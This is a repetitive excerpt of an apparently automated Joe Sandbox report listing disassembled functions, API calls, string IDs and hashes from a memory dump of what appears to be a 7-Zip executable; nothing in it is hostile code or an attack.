                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$freememset
                                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                                  • API String ID: 2276422817-3653984579
                                                                                                                                                                                                                                                  • Opcode ID: 2d51f8118dbba9063f6913f1af84da5abfe4bad0c8c255e5030384decc0f2edb
                                                                                                                                                                                                                                                  • Instruction ID: f634c7e32ca087824df1689ac4e47655e510f8a6e4bdfa59c35a570c233fcfc0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d51f8118dbba9063f6913f1af84da5abfe4bad0c8c255e5030384decc0f2edb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F117F53350A4291DB28EB35D9643AD6321FBC5BF4F488231EA2E477A6DF28D4558340
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BB8EB
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009BB90A
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$freememset
                                                                                                                                                                                                                                                  • String ID: ERROR: $WARNING:
                                                                                                                                                                                                                                                  • API String ID: 2276422817-2114518728
                                                                                                                                                                                                                                                  • Opcode ID: 8e3bba8349f46928f641cc6bcc1daefcf3e0a2bdec40cb1967d92b4bec262380
                                                                                                                                                                                                                                                  • Instruction ID: 3343ad715f334b8e6dd293da4ada9a977c4b5be9951982bbb581f4433f5ec10e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e3bba8349f46928f641cc6bcc1daefcf3e0a2bdec40cb1967d92b4bec262380
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B116013711A8041DA28EB22E9557AE6311F7C5BE4F488222EF6F0B391DF6CC485C300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeavefputs
                                                                                                                                                                                                                                                  • String ID: ERROR:
                                                                                                                                                                                                                                                  • API String ID: 4171338575-977468659
                                                                                                                                                                                                                                                  • Opcode ID: be048cf6878443a2184a7b989802cb390b223653ec2da76719a795addb1c1f7a
                                                                                                                                                                                                                                                  • Instruction ID: d36ff9bb0c538c7a9553de0fea4eac39da4ed2735872aff92d6305b7302a3ab2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be048cf6878443a2184a7b989802cb390b223653ec2da76719a795addb1c1f7a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F119D7235598185DB15DF39EE647E82361EB85FA4F588332DF6E4B2A5CF388444C310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BBC6C
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009BBC78
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$freememset
                                                                                                                                                                                                                                                  • String ID: Archive size: $Files read from disk
                                                                                                                                                                                                                                                  • API String ID: 2276422817-3736835528
                                                                                                                                                                                                                                                  • Opcode ID: 2efab2b554c4f96bbbe87714b73d16ad6655604f82f8fcc69e920b2b3405c337
                                                                                                                                                                                                                                                  • Instruction ID: a37e35b43f73bc9f8a8b0988867f54133091ce86984e243942ab69e1a27b79f2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2efab2b554c4f96bbbe87714b73d16ad6655604f82f8fcc69e920b2b3405c337
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A11306321494191DF30EF25E89139D6730FBC47E8F849622E65E4B6B9DF68C68AC710
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: a$z
                                                                                                                                                                                                                                                  • API String ID: 0-4151050625
                                                                                                                                                                                                                                                  • Opcode ID: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                                                                                                                                                                                                  • Instruction ID: b8ddbd12843945f83ac5d2efb2b56231a381007f7696e515713145652db78141
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D301AF17F2119AD5EB347B21AB543F8A256A715FA1F8DC1338F8D07711E1294AD2E305
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                  • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                                                                                                                                  • API String ID: 1646373207-1489217083
                                                                                                                                                                                                                                                  • Opcode ID: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                                                                                                                                                                                                  • Instruction ID: a7f3feba60696b9e383ac29468efce36f01c36e9fc22f137bd72645c0ba760fc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3F04937715604CADF34DB60F9A43AD73A4ABC8366F444835E65E42AE0DB3CDA88CA05
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BBACF
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009BBAFC
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 0097237E
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 009723C4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$free
                                                                                                                                                                                                                                                  • String ID: Open archive: $StdOut
                                                                                                                                                                                                                                                  • API String ID: 3873070119-2401103298
                                                                                                                                                                                                                                                  • Opcode ID: ce59a64c16b32fbdc4fabaafe929a8674e998fc0354dffc2ed294dc1c66bfb13
                                                                                                                                                                                                                                                  • Instruction ID: bf2e08828e67a9c02ba74ed72ccd5e9e5ea114c420d72d85b4641de41c6e3de2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce59a64c16b32fbdc4fabaafe929a8674e998fc0354dffc2ed294dc1c66bfb13
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02F0FEA6701D8581DE059F2ADA997AD6362FB84FE4F98D432CD0E4B359DF28C499C310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$fputc
                                                                                                                                                                                                                                                  • String ID: $:
                                                                                                                                                                                                                                                  • API String ID: 1185151155-4041779174
                                                                                                                                                                                                                                                  • Opcode ID: 158b50a13c805fd8231fb2a9988c9be95edbaf40012f3606b1facd01aece21a3
                                                                                                                                                                                                                                                  • Instruction ID: 4f74806a50b33fd414c26d9537ffcd7faec72dc02bd9a9d4d2cbfd77da4593d1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 158b50a13c805fd8231fb2a9988c9be95edbaf40012f3606b1facd01aece21a3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E06D97304A8082CB219B2AED5835D6361FB99FCCF48C122EE8E0771ADF2CC108CB11
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                  • String ID: GetLargePageMinimum$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 1646373207-2515562745
                                                                                                                                                                                                                                                  • Opcode ID: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                                                                                                                                                                                                  • Instruction ID: 483ff8af0833320bb86477f39977261c3cb305b0d57cadadd8809141a43b904d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14E0BF64763B0291FE19DF65FDA53642364AB85B15F840529851E42361FF3CD245C340
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 408039514-0
                                                                                                                                                                                                                                                  • Opcode ID: eb35eda3f074dfc2ab316374226af9b5045eb8b96d0d247d19b9edefb77cef74
                                                                                                                                                                                                                                                  • Instruction ID: 25fbde5725cc5f9e51296961f33500c3a392c95c20e8138b893caeaab04c3c95
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb35eda3f074dfc2ab316374226af9b5045eb8b96d0d247d19b9edefb77cef74
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68818D33319A4086CB24DF66E84175EB7A5F789BA4F548215EF9E43B68EF38C851C740
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8b054cff316d6362c540f9b163884723641e5c2bea3e11dd8c59b701f31abf9a
                                                                                                                                                                                                                                                  • Instruction ID: 36005570cf7ca6f0b752a4ddd6e797bc15dfca138e807c8914b0d604451d91cc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b054cff316d6362c540f9b163884723641e5c2bea3e11dd8c59b701f31abf9a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA41D42371978196CB20EF22D54066E6764FF86BE4F489221FFAD17B59DF28C545C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1534225298-0
                                                                                                                                                                                                                                                  • Opcode ID: ea4c382c0509df945921f23a34c49439f2ef1336e99032456fda2b95fe78acec
                                                                                                                                                                                                                                                  • Instruction ID: 7ddb16b14d4fa680533b70df4f95da51956c460d32b34faca3ceee54f8f32126
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea4c382c0509df945921f23a34c49439f2ef1336e99032456fda2b95fe78acec
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C241E9272182C095C720DB25E44029FABB1F3D77A8F584115EB990BB99C7BED099CB51
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ErrorLastmemmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3561842085-0
                                                                                                                                                                                                                                                  • Opcode ID: fffb23e19f922e00206dffc0701e93bf50c9df1a145a300dd5ae7f7b9b1c6057
                                                                                                                                                                                                                                                  • Instruction ID: 4b769286c07f1ff66161d6724087a2927d0794015b5bc2d2e31b56358841f2b1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fffb23e19f922e00206dffc0701e93bf50c9df1a145a300dd5ae7f7b9b1c6057
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0315273214A4081CB20DF25E46175E7360FBCABA4F94A225F79E477A9DF38C545C740
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1534225298-0
                                                                                                                                                                                                                                                  • Opcode ID: b755f34292b14f3c78f859b325e48777a4122fb93ec97f274d8f258d9deb2584
                                                                                                                                                                                                                                                  • Instruction ID: 28c41522261d25a8505dba3c101a2f89fe56146ee6d35cdf74f1789340316a93
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b755f34292b14f3c78f859b325e48777a4122fb93ec97f274d8f258d9deb2584
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F21BF23711B848ADA20EF5BE9942297324F789BE4B48C135EF6D0BB95DF34D862C310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1475443563-0
                                                                                                                                                                                                                                                  • Opcode ID: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                                                                                                                                                                                                  • Instruction ID: 7f2b476461fbb1639a9e802c743f3687fb1eef3f63c448ee3c79633178d68d2e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2111C2E370874191FB089F2A99513E82229DB49FD4F94D429CE098B307EF38CE45C305
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00973C2A
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00973C36
                                                                                                                                                                                                                                                  • _CxxThrowException.MSVCRT ref: 00973C54
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00973C80
                                                                                                                                                                                                                                                  • _CxxThrowException.MSVCRT ref: 00973C9E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2296236218-0
                                                                                                                                                                                                                                                  • Opcode ID: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                                                                                                                                                                                                  • Instruction ID: 224adb71b36d1788a468add76c21d36c8fe3f854be2f906ae20f08d28a8256ec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79215CB3704B4886DB10DF2AE850759B7A5FB98B98F58C125DA8D87724EB78C945C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
